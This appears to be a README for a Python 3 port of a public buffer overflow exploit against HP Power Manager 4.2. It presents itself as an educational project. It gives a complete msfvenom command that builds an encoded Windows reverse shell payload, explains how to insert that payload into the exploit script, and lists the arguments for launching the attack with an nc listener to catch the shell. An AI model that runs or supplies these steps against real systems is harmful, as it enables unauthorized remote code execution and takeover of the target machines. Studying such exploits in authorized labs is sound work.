Since official support for Python 2 is coming to an end, and because I want to improve both my Python 3 skills and my understanding of exploits, I ported the well-known HP Power Manager 4.2 'formExportDataLogs' buffer overflow exploit from Python 2 to Python 3. Please review the original Python 2 code by Muhammad Haidari on his GitHub page: https://github.com/Muhammd/HP-Power-Manager
Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
Setup
Run
msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' -e x86/alpha_mixed --platform windows -f c
to create the reverse shell payload (the original command was missing the -e flag in front of the x86/alpha_mixed encoder). Then replace the payload at line 39 of the script with your own payload. LPORT must match the local port you later pass to the script, since that is the port the script's nc listener waits on.
Usage: python3 hpm_exploit_p3.py followed by three positional arguments, in this order:
1. IP address the HP Power Manager is running on
2. Port the application is running on
3. Local port your shellcode connects back to (the script starts an nc listener on this port to catch the reverse shell)
This project is made for educational and ethical testing purposes only. It is the end user's responsibility to obey all applicable laws.